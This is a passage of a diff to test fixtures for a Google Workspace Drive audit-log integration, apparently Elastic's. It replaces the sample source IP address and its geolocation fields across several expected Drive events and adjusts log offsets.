 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"rename\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":true},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"bar.gif\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_value\",\"value\":\"foo.gif\",\"new_value\":\"bar.gif\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -930,27 +874,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 10319,
+ "log.offset": 10305,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -971,7 +911,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"untrash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "creation"
@@ -993,27 +933,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 11074,
+ "log.offset": 11059,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1034,7 +970,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"sheets_import_range\",\"parameters\":[{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -1056,27 +992,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 11777,
+ "log.offset": 11761,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1097,7 +1029,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"trash\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "deletion"
@@ -1119,27 +1051,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 12514,
+ "log.offset": 12497,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1160,7 +1088,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "change"
@@ -1182,27 +1110,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 13215,
+ "log.offset": 13197,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1223,7 +1147,7 @@
 "event.dataset": "google_workspace.drive",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"upload\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}",
 "event.provider": "drive",
 "event.type": [
 "creation"
@@ -1245,27 +1169,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 13922,
+ "log.offset": 13903,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "owner"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1286,7 +1206,7 @@ "event.dataset": "google_workspace.drive", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"view\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"shared_drive_id\",\"value\":\"1234\"}]}}", "event.provider": "drive", "event.type": [ "info" 
@@ -1309,27 +1229,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 14624, + "log.offset": 14604, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "owner" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1352,7 +1268,7 @@ "event.dataset": "google_workspace.drive", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_acl_editors\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "event.provider": "drive", "event.type": [ "change" @@ -1378,27 +1294,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 15366, + "log.offset": 15345, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "owner" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -1421,7 +1333,7 @@ "event.dataset": "google_workspace.drive", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "event.provider": "drive", "event.type": [ "change" @@ -1448,27 +1360,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 16275, + "log.offset": 16253, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "owner" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
